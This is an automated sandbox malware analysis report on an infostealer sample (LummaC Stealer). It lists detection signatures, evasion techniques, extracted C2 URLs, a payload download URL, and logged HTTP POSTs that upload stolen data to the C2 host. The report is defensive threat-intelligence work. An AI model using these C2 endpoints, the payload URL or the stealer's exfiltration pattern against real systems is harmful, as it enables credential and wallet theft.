Edit tour

Windows Analysis Report
Set-up.exe

Overview

General Information

Sample name:	Set-up.exe
Analysis ID:	1664223
MD5:	26e8e71a6a3631d980fe7c98883cfe49
SHA1:	ff8fc1599e1c745c52a704b71884a10c55256742
SHA256:	7befa4a4397e54b7e5116de0f3238a963e84411145a299186c6885be9929d8ce
Tags:	de-pumpedexeuser-abuse_ch
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Set-up.exe (PID: 1564 cmdline: "C:\Users\user\Desktop\Set-up.exe" MD5: 26E8E71A6A3631D980FE7C98883CFE49)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["jesxterplay.run/tuyhd", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "637b55279021aab33278188cfa638397"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1578163081.0000000003C33000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Set-up.exe PID: 1564	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-04-13T20:22:24.529121+0200	2028371	3	Unknown Traffic	192.168.2.5	49703	89.169.54.153	443	TCP
2025-04-13T20:22:40.249736+0200	2028371	3	Unknown Traffic	192.168.2.5	49692	104.21.48.1	443	TCP
2025-04-13T20:22:42.525120+0200	2028371	3	Unknown Traffic	192.168.2.5	49693	104.21.48.1	443	TCP
2025-04-13T20:22:43.786036+0200	2028371	3	Unknown Traffic	192.168.2.5	49694	104.21.48.1	443	TCP
2025-04-13T20:22:45.399384+0200	2028371	3	Unknown Traffic	192.168.2.5	49695	104.21.48.1	443	TCP
2025-04-13T20:22:48.745228+0200	2028371	3	Unknown Traffic	192.168.2.5	49698	104.21.48.1	443	TCP
2025-04-13T20:22:50.320351+0200	2028371	3	Unknown Traffic	192.168.2.5	49700	104.21.48.1	443	TCP
2025-04-13T20:22:51.816990+0200	2028371	3	Unknown Traffic	192.168.2.5	49701	104.21.48.1	443	TCP
2025-04-13T20:22:54.382305+0200	2028371	3	Unknown Traffic	192.168.2.5	49702	104.21.48.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: jesxterplay.run/tuyhd	Avira URL Cloud: Label: malware
Source: https://h1.mockupeastcoast.shop/	Avira URL Cloud: Label: malware
Source: https://jesxterplay.run:443/tuyhd	Avira URL Cloud: Label: malware
Source: https://h1.mockupeastcoast.shop/shark.binj	Avira URL Cloud: Label: malware
Source: https://h1.mockupeastcoast.shop/shark.binoded	Avira URL Cloud: Label: malware
Source: https://jesxterplay.run/tuyhd	Avira URL Cloud: Label: malware
Source: https://h1.mockupeastcoast.shop/shark.bine32.amsi.csv	Avira URL Cloud: Label: malware
Source: https://jesxterplay.run/tuyhd?	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["jesxterplay.run/tuyhd", "jawdedmirror.run/ewqd", "changeaie.top/geps", "lonfgshadow.live/xawi", "liftally.top/xasj", "nighetwhisper.top/lekd", "salaccgfa.top/gsooz", "zestmodp.top/zeda", "owlflright.digital/qopy"], "Build id": "637b55279021aab33278188cfa638397"}

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jesxterplay.run/tuyhd
Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jawdedmirror.run/ewqd
Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String decryptor: changeaie.top/geps
Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lonfgshadow.live/xawi
Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String decryptor: liftally.top/xasj
Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String decryptor: nighetwhisper.top/lekd
Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String decryptor: salaccgfa.top/gsooz
Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String decryptor: zestmodp.top/zeda
Source: 00000000.00000003.1571465846.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String decryptor: owlflright.digital/qopy

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CCA30F CryptUnprotectData,	0_3_02CCA30F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC9A0C CryptUnprotectData,	0_3_02CC9A0C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_3_02CC9FDA CryptUnprotectData,	0_3_02CC9FDA

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49693 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49702 version: TLS 1.2

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\deploy\release\psi3\psi_32\cmake\apps\sua\RelWithDebInfo\sua.pdb source: Set-up.exe

Source: C:\Users\user\Desktop\Set-up.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007415C5 _wcspbrk,__getdrive,FindFirstFileExW,_wcspbrk,__wfullpath_helper,_IsRootUNCName,GetDriveTypeW,_free,___loctotime64_t,_free,__sopen_s,__fstat64,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,		0_2_007415C5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_007177A0 _memset,FindFirstFileW,GetLastError,_memcpy_s,FindNextFileW,InterlockedIncrement,InterlockedIncrement,_memcpy_s,__time64,WaitForSingleObject,InterlockedDecrement,		0_2_007177A0

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov dword ptr [esp], esi	0_3_02CB131A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-58316D2Ah]	0_3_02CFE0B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [eax], cx	0_3_02CDA193
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+00000150h]	0_3_02CCC4CF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+19BB5690h]	0_3_02CFE410
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-28h]	0_3_02CBD9E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+0Ch]	0_3_02CBD9E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 7A5B3AD5h	0_3_02CFD930
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov esi, ecx	0_3_02CC9EB8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	0_3_02CFCCA0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+000000F8h]	0_3_02CCB29B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx+54h]	0_3_02CD62A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	0_3_02CD62A0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+74h]	0_3_02CE6252
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+5168B178h]	0_3_02CE1250
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]	0_3_02CE63ED
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then jmp ecx	0_3_02CBF380
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+0Ch]	0_3_02CE03A3
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [ecx], ax	0_3_02CD0340
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	0_3_02CBB0D0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000290h]	0_3_02CE3EE6
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov dword ptr [esp+18h], eax	0_3_02CF4021
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-5544DF0Eh]	0_3_02CF86E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-5544DF02h]	0_3_02CC2674
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch]	0_3_02CD2670
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov ebp, eax	0_3_02CB8600
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], A4BF7AEEh	0_3_02CF3610
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-23C963A4h]	0_3_02CE562A
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+19BB568Ch]	0_3_02CFA630
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movsx ecx, byte ptr [esi+eax]	0_3_02CC87E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	0_3_02CDF79F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-27226D76h]	0_3_02CBD5C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+19BB5690h]	0_3_02CFE5B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], FDD2FF0Ch	0_3_02CF6500
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+1Ch]	0_3_02CE052B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [eax], cx	0_3_02CE052B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+755E824Eh]	0_3_02CD0A0F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [esi], al	0_3_02CD0A0F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov word ptr [eax], cx	0_3_02CE0B8E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-5544DF12h]	0_3_02CF3BB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+01h]	0_3_02CB1B40
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov ebx, eax	0_3_02CCEB51
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5147A5E4h]	0_3_02CDDB00
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then inc edx	0_3_02CFCB10
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+00000090h]	0_3_02CDFB30
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov dword ptr [esp+04h], eax	0_3_02CCAB32
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-1257097Eh]	0_3_02CC88B0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h	0_3_02CD6900
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+24h]	0_3_02CBBED0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000290h]	0_3_02CE3EEC
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx+00000098h]	0_3_02CD0EF2
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_3_02CB9E70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_3_02CB9E70
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_3_02CE1E20
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov esi, ecx	0_3_02CCBFDF
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_3_02CEEF90
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000290h]	0_3_02CE3F5B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-12570982h]	0_3_02CF6CB0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-39EFAB59h]	0_3_02CD2C4B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+000000CEh]	0_3_02CCEC7B
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then cmp word ptr [edx+esi], 0000h	0_3_02CD4DC0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ebp+02h]	0_3_02CD6DD0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 4x nop then mov byte ptr [esi], al	0_3_02CE4D69

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: jesxterplay.run/tuyhd
Source: Malware configuration extractor	URLs: jawdedmirror.run/ewqd
Source: Malware configuration extractor	URLs: changeaie.top/geps
Source: Malware configuration extractor	URLs: lonfgshadow.live/xawi
Source: Malware configuration extractor	URLs: liftally.top/xasj
Source: Malware configuration extractor	URLs: nighetwhisper.top/lekd
Source: Malware configuration extractor	URLs: salaccgfa.top/gsooz
Source: Malware configuration extractor	URLs: zestmodp.top/zeda
Source: Malware configuration extractor	URLs: owlflright.digital/qopy

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 89.169.54.153 89.169.54.153

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49695 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49693 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49692 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49694 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49698 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49702 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49701 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49703 -> 89.169.54.153:443

Source: global traffic	HTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 79Host: jesxterplay.run
Source: global traffic	HTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SEYjzUhpQnn0KGfdUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 14909Host: jesxterplay.run
Source: global traffic	HTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=fAdIMMlEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 15018Host: jesxterplay.run
Source: global traffic	HTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=96GI6Kb2KhzYdUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 20537Host: jesxterplay.run
Source: global traffic	HTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=frxbM6K5Grh6WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 5439Host: jesxterplay.run
Source: global traffic	HTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=hnOW43SlYUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 2495Host: jesxterplay.run
Source: global traffic	HTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=bth717d0f5dfUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 575138Host: jesxterplay.run
Source: global traffic	HTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 117Host: jesxterplay.run

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: c.pki.goog
Source: global traffic	DNS traffic detected: DNS query: jesxterplay.run
Source: global traffic	DNS traffic detected: DNS query: h1.mockupeastcoast.shop

Source: unknown

HTTP traffic detected: POST /tuyhd HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Length: 79Host: jesxterplay.run

Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Set-up.exe, 00000000.00000003.1462927417.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Set-up.exe, 00000000.00000003.1434554736.0000000003B28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://h1.mo
Source: Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://h1.mockupeastcoast.shop/
Source: Set-up.exe, 00000000.00000002.1577339370.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1577339370.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://h1.mockupeastcoast.shop/shark.bin
Source: Set-up.exe, 00000000.00000002.1577466712.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://h1.mockupeastcoast.shop/shark.bine32.amsi.csv
Source: Set-up.exe, 00000000.00000002.1577339370.0000000000F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://h1.mockupeastcoast.shop/shark.binj
Source: Set-up.exe, 00000000.00000002.1577339370.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://h1.mockupeastcoast.shop/shark.binoded
Source: Set-up.exe, 00000000.00000003.1422796019.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1528021047.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run/
Source: Set-up.exe, 00000000.00000003.1531434618.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1549566194.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run/c
Source: Set-up.exe, 00000000.00000003.1512532105.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run/os
Source: Set-up.exe, 00000000.00000003.1512532105.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jesxterplay.run/s
